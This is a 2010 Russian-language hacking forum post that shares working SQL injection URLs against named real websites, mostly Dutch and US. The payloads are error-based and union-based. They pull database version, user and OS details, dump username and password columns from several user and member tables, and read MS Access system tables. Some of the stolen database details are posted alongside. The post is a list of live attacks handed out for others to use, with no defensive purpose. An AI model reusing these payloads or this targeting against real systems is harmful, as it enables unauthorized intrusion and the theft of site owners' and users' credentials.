Показать сообщение отдельно

  #10  
Старый 27.05.2010, 20:49
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
С нами: 8762549

Репутация: 1069


По умолчанию

Сайт: http://agenda.gaynews.nl
ТИЦ: 0
PR: 4
Код:
http://agenda.gaynews.nl/show.php?id=17349'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),1,63),+floor(rand(0)*2)))--+
version - 4.1.22-community
user - gayamsterdam@SERVER1
database - master
os - Win32

============================================

Сайт: http://www.crew4you.nl
ТИЦ: 0
PR: 1
Код:
http://www.crew4you.nl/show.php?id=22'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+cfy_users--+&hid=0  

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+cr_users--+&hid=0  

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+dg_users--+&hid=0  

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+md_users--+&hid=0  

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+dg_clients--+&hid=0
version - 5.1.45
user - forest_music@localhost
database - forest_music
os - redhat-linux-gnu

============================================

Сайт: http://www.tekcursus.nl
ТИЦ: 0
PR: 0
Код:
http://www.tekcursus.nl/website/show.php?formid=2+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),1,63),+floor(rand(0)*2)))--+
version - 4.1.12-standard
user - datekcursu_webdb@localhost
database - datekcursu_webdb
os - pc-linux-gnu

============================================

Устал я от этого msaccess'а, сливаю =\

============================================

Сайт: http://www.spokanemarcom.com
ТИЦ: 0
PR: 4
Код:
Вывод нескольких записей с перебором:
http://www.spokanemarcom.com/news.asp?id=-99+union+select+1,(select+top+1+username%2bchr(59)%2bpassword+from+members)%2bchr(58)%2b(select+top+1+username%2bchr(59)%2bpassword+from+members+where+username%2bchr(59)%2bpassword+not+in+(select+top+1+username%2bchr(59)%2bpassword+from+members)),3,4,5,6,7,8,9,10,11+from+members%00

Просто вывод с перебором:
http://www.spokanemarcom.com/news.asp?id=-99+union+select+top+1+1,username%2bchr(59)%2bpassword%2bchr(59)%2bemail,3,4,5,6,7,8,9,10,11+from+members+where+username%2bchr(59)%2bpassword%2bchr(59)%2bemail+not+in+(select+top+1+username%2bchr(59)%2bpassword%2bchr(59)%2bemail+from+members)+order+by+id%00
============================================

+ ещё парочка сайтов с этой субд..

============================================

Сайт: http://www.martinitiles.com
ТИЦ: 0
PR: 1
Код:
http://www.martinitiles.com/item2.php?id=197+union+select+1,2,data,4,5,6+from+msysaccessobjects+where+type=1%00
============================================

Сайт: http://www.uni-bright.com
ТИЦ: 0
PR: 1
Код:
http://www.uni-bright.com/item2.php?id=167+union+select+1,2,data,4,5,6+from+msysaccessobjects+where+type=1%00

Последний раз редактировалось aka_zver; 27.05.2010 в 20:53..
 
Ответить с цитированием